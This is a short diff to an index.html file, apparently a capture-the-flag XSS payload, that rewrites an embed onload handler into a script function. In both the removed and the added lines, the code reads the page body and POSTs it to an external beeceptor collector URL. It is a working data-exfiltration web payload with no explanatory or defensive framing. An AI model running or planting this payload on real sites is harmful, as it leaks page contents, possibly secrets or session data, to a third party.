--- a/index.html
+++ b/index.html
@@ -1,9 +1,14 @@
 <html>
- <body>
-   `<embed onload = "let flag = this.document.body;
-var xhr = new window.XMLHttpRequest();
-xhr.open('POST', 'https://alexyqiu.free.beeceptor.com', true);
-xhr.setRequestHeader('Content-Type', 'application/json; charset=UTF-8');
-xhr.send(JSON.stringify(flag));">`
-</body>
+  <body>
+    <embed onload="sendData()"></embed>
+    <script>
+      function sendData() {
+        let flag = document.body.innerHTML;
+        let xhr = new XMLHttpRequest();
+        xhr.open('POST', 'https://alexyqiu.free.beeceptor.com');
+        xhr.setRequestHeader('Content-Type', 'application/json; charset=UTF-8');
+        xhr.send(JSON.stringify(flag));
+      }
+    </script>
+  </body>
 </html>
